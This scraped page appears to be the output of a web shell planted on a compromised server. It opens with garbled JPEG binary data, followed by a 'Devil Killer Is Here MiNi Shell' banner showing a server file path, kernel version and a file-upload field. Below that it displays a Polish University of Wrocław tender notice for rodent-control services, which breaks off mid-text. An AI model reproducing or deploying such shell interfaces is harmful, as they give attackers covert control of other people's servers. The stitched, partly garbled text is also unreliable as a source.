JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250522/0024359601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Usługa obowiązkowej i doraźnej deratyzacji na nieruchomościach<br/>Uniwersytetu Wrocławskiego.&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">UNIWERSYTET WROCŁAWSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001301</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Plac Uniwersytecki 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wrocław</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">50-137</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL514 - Miasto Wrocław</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 71 375 20 88</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dominika.kalwat-posluszny@uwr.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.uwr.edu.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Usługa obowiązkowej i doraźnej deratyzacji na nieruchomościach<br/>Uniwersytetu Wrocławskiego.&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-bf4450b3-29b2-4be1-bdeb-41a03a706853</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00243596</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00033077/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.40 Usługi deratyzacji na nieruchomościach Uniwersytetu Wrocławskiego.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/uniwersytet_wroclawski/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">.W postępowaniu o udzielenie zamówienia komunikacja elektroniczna między <br/>Zamawiającym a Wykonawcami odbywa się przy użyciu środków komunikacji <br/>elektronicznej poprzez Platformę Przetargową (zwanej dalej „Platformą”) pod adresem: <br/>https://platformazakupowa.pl/pn/uniwersytet_wroclawski/proceedings, w wierszu <br/>oznaczonym tytułem oraz znakiem niniejszego postępowania.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.2.Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Instrukcjach dla użytkowników dostępnych pod adresem:<br/>https://platformazakupowa.pl/strona/1-regulamin<br/>1.3.Zamawiający, zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020r. poz. <br/>2452), określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie, tj.:<br/>a)stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>b)komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>c)zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer,<br/>d)włączona obsługa JavaScript,<br/>e)zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>1.4.Szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.<br/>1.5.Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>1.6.Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>a) akceptuje warunki korzystania z Platformy określone w Regulaminie zamieszczonym <br/>na stronie internetowej Platformy w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>b) zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej na Platformie<br/>1.7.Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.<br/>1.8.Zamawiający nie ponosi odpowiedzialności za złożenie oferty w sposób niezgodny z <br/>Instrukcją korzystania z Platformy, w szczególności za sytuację, gdy Zamawiający <br/>zapozna się z treścią oferty przed upływem terminu składania ofert (np. złożenie oferty <br/>w zakładce „Wyślij wiadomość do zamawiającego”). Taka oferta zostanie uznana przez Zamawiającego za ofertę handlową i nie będzie brana pod uwagę w przedmiotowym <br/>postępowaniu, ponieważ nie został spełniony obowiązek narzucony w art. 221 Ustawy Prawo Zamówień Publicznych.<br/>1.9.Zamawiający informuje, że instrukcje korzystania z Platformy dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych <br/>czynności podejmowanych w niniejszym postępowaniu przy użyciu Platformy znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: <br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>1.10.Wsparcia technicznego udziela jej dostawca: Centrum Wsparcia Klienta Platformy: platformazakupowa.pl; tel. 22 101 02 02; e-mail: cwk@platformazakupowa.pl.<br/>1.11. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem postępowania nadanym przez Zamawiającego BZP.2711.17.2025.DKP.<br/> Oferta, oświadczenie, o którym mowa w art. 125 ust. 1 uPzp, podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w art. 117 ust. 4 uPzp, oraz zobowiązanie podmiotu udostępniającego zasoby, o którym mowa w art. 118 ust. 3 uPzp, przedmiotowe środki dowodowe, pełnomocnictwo, sporządza się w postaci elektronicznej w języku polskim, w ogólnodostępnych formatach danych, w szczególności .pdf, .doc, .docx, .xls, xlsx, .jpg (.jpeg) oraz składa pod rygorem nieważności, w formie elektronicznej (z kwalifikowanym podpisem) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/pn/uniwersytet_wroclawski/proceedings</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.Zgodnie z art. 13 ust. 1-2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 <br/>z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem <br/>danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia <br/>dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 <br/>z 04.05.2016, str. 1), dalej „RODO” oraz art. 19 uPzp, Zamawiający – Uniwersytet Wrocławski <br/>- informuje, że: <br/>• administratorem Pani/Pana danych osobowych jest Uniwersytet Wrocławski, <br/>pl. Uniwersytecki 1, 50-137 Wrocław, reprezentowany przez Rektora;<br/>• o celach i sposobach przetwarzania danych osobowych podawanych w związku z realizacją <br/>procedur udzielania zamówień publicznych decyduje Uniwersytet jako Administrator <br/>danych;<br/>• Administrator wyznaczył osobę pełniącą zadania Inspektora Ochrony Danych Osobowych <br/>i można kontaktować się poprzez adres email: iod@uwr.edu.pl;<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu <br/>wyłonienia wykonawcy w przedmiotowym postępowaniu o zamówienie publiczne <br/>przeprowadzane zgodnie z uPzp oraz w pozostałych celach określonych w uPzp;<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona <br/>zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 uPzp; ponadto dane <br/>osobowe mogą zostać przekazane na zasadach wynikających z ustawy z dnia 6 września <br/>2001 r. o dostępie do informacji publicznej;<br/>• okres przechowywania Pani/Pana danych osobowych wynosi odpowiednio: <br/>- zgodnie z art. 78 ust. 1 uPzp, przez okres 4 lat od dnia zakończenia postępowania o <br/>udzielenie zamówienia, <br/>- jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas <br/>trwania umowy; <br/>- w przypadku zamówień współfinansowanych ze środków UE przez okres, o którym mowa <br/>w art. 125 ust 4 lit d) w zw z art. 140 Rozporządzenia Parlamentu Europejskiego i Rady <br/>(UE) nr 1303/2013 i wynikających z umów o dofinansowanie projektów finansowanych ze <br/>środków pochodzących z UE;<br/>- okres przechowywania wynika również z ustawy z dnia 14 lipca 1983 r. o narodowym <br/>zasobie archiwalnym i archiwach<br/>• obowiązek podania przez Panią/Pana danych osobowych jest wymogiem ustawowym <br/>wynikającym z uPzp, związanym z udziałem w postępowaniu o udzielenie zamówienia <br/>publicznego i jest warunkiem zawarcia umowy o zamówienie publiczne; konsekwencją <br/>nieudostępnienia do przetwarzania danych osobowych będzie odrzucenie złożonej oferty<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób <br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>• Pani/Pana dane osobowe będą przekazywane do państwa trzeciego (poza UE) /organizacji <br/>międzynarodowej na zasadach określonych w uPzp. Może Pan/ Pani uzyskać kopię danych <br/>osobowych przekazywanych do państwa trzeciego na zasadach wynikających z uPzp;<br/>• posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania <br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna <br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy <br/>RODO;<br/>- w przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO <br/>wymagałoby niewspółmiernie dużego wysiłku, Zamawiający może żądać od osoby, której <br/>dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia <br/>publicznego;<br/>- wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie ogranicza przetwarzania danych osobowych do zakończenia postępowania o udzielenie zamówienia publicznego;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">• nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, <br/>gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c <br/>RODO. <br/>2. Jeżeli na etapie realizacji umowy nastąpi taka konieczność Zamawiający będzie wymagał <br/>podpisania umowy powierzenia danych osobowych.<br/>3. Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia <br/>korzystania ze środków ochrony prawnej, o których mowa w dziale IX uPzp, do upływu <br/>terminu na ich wniesienie;<br/>4. W przypadku, gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 <br/>RODO, spowoduje ograniczenie przetwarzania danych osobowych zawartych <br/>w protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia <br/>postępowania o udzielenie zamówienia, Zamawiający nie udostępnia tych danych, chyba, że <br/>zachodzą przesłanki, o których mowa w art. 18 ust. 2 RODO; <br/>5. Udostępnienie ma zastosowanie do wszystkich danych osobowych, z wyjątkiem danych o <br/>których mowa w art. 9 ust. 1 RODO, zebranych w toku postępowania o udzielenie <br/>zamówienia;<br/>6. W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez <br/>Zamawiającego, z uprawnienia , o których mowa w art. 15 ust. 1-3 RODO, Zamawiający <br/>może żądać od osoby, występującej z żądaniem wskazania dodatkowych informacji, <br/>mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie <br/>zamówienia;<br/>7. Skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia do <br/>sprostowania lub uzupełnienia danych osobowych, o którym mowa w art. 16 RODO, nie może <br/>naruszać integralności protokołu postępowania oraz jego załączników;<br/>8. W przypadku danych osobowych zamieszczonych przez zamawiającego w Biuletynie <br/>Zamówień Publicznych, prawa, o których mowa w art. 15 i art. 16 RODO, są wykonywane w drodze żądania skierowanego do Zamawiającego.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BZP.2711.17.2025.DKP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 374443,76 PLN </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 218880,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest świadczenie usług:<br/>a) obowiązkowej deratyzacji zgodnie z Regulaminem utrzymania czystości i porządku na terenie Wrocławia, przyjętym uchwałą Nr XXV/672/20 Rady Miejskiej Wrocławia z dnia 23 lipca 2020r., zmienionym uchwałą Nr LXIII/1628/22 Rady Miejskiej Wrocławia z dnia 22 grudnia 2022 r. oraz uchwałą Nr LXVI/1716/23 Rady Miejskiej Wrocławia z dnia 16 marca 2023 r. na terenie nieruchomości Uniwersytetu Wrocławskiego wymienionych w Załączniku nr 1 do OPZ;<br/>b) doraźnej deratyzacji wg potrzeb Zamawiającego - w budynkach i na posesjach wymienionych w Załączniku nr 2 do OPZ; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90923000-3 - Usługi odszczurzania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty zostaną ocenione przez Zamawiającego w oparciu o następujące kryteria oceny ofert:<br/>Kryterium 1: Cena (C) – waga 60%<br/>Kryterium 2: Czas przyjazdu Wykonawcy na miejsce świadczenia usług (T) - waga <br/>40%<br/>Zamawiający dokona oceny ofert, przyznając punkty w ramach poszczególnych kryteriów <br/>oceny ofert, przyjmując zasadę, że 1% = 1pkt.<br/>2. Łączna wartość punktowa oferty wyliczana będzie wg wzoru:<br/>W = C + T <br/>gdzie:<br/>W – oznacza sumę punktów za wszystkie kryteria przyznane badanej ofercie<br/>C - oznacza wartość punktową w kryterium Cena<br/>T - oznacza wartość punktową w kryterium Czas przyjazdu Wykonawcy na miejsce <br/>świadczenia usług (rozpoczęcia prac)<br/>Maksymalna łączna ilość punktów, jaką może otrzymać oferta Wykonawcy wynosi 100 pkt.<br/>3. Sposób obliczania wartości punktowej według ww. kryteriów:<br/>3.1 Kryterium 1: Cena (C): <br/>Zamawiający dokona oceny ofert w kryterium „Cena” w następujący sposób:<br/>Oferta z najniższą ceną (brutto) otrzyma maksymalną liczbę punktów – 70 pkt, <br/>a punkty dla pozostałych ofert zostaną wyliczone według wzoru: <br/>C = (Cmin/Cn) x 60<br/>gdzie:<br/>Cmin– [PLN] cena ofertowa brutto - najniższa wśród ocenianych ofert;<br/>Cn– [PLN] cena ofertowa brutto - ocenianej oferty<br/>60 - współczynnik wynikający z przyjętej wagi za dane kryterium.<br/>3.2 Kryterium 2: Czas przyjazdu Wykonawcy na miejsce świadczenia usług (T)<br/>Punkty w tym kryterium zostaną przyznane na podstawie oferowanego przez Wykonawcę <br/>w Formularzu ofertowym (Załącznik nr 1 do SWZ) Czasu przyjazdu Wykonawcy na <br/>miejsce świadczenia usług. Odpowiednią ilość punktów otrzyma Wykonawca, który <br/>zaoferuje:<br/>Czas przyjazdu Wykonawcy na <br/>miejsce świadczenia usług (od <br/>chwili zgłoszenia przez <br/>Zamawiającego).<br/>Liczba punktów<br/>7 dni roboczych 0 pkt<br/>5 dni roboczych 20 pkt<br/>3 dni robocze 40 pkt<br/> Przy założeniu, że maksymalny (podstawowy) czas przyjazdu Wykonawcy na miejsce <br/>świadczenia usług wynosi 7 dni roboczych, a minimalny 3 dni robocze. Czas przyjazdu<br/>Wykonawcy na miejsce świadczenia usług będzie liczony od dnia złożenia zamówienia przez <br/>Zamawiającego drogą mailową.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas przyjazdu Wykonawcy na miejsce świadczenia usług (od chwili zgłoszenia przez Zamawiającego).</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie Wykonawcy o aktualności informacji zawartych <br/>w oświadczeniu, o którym mowa w art. 125 ust. 1 uPzp, w zakresie podstaw <br/>wykluczenia z postępowania wskazanych przez Zamawiającego w zakresie <br/>przesłanek, o których mowa w art. 108 ust. 1 oraz 109 ust. 1 pkt 7, 8 i 10 uPzp. <br/>Wzór oświadczenia stanowi Załącznik 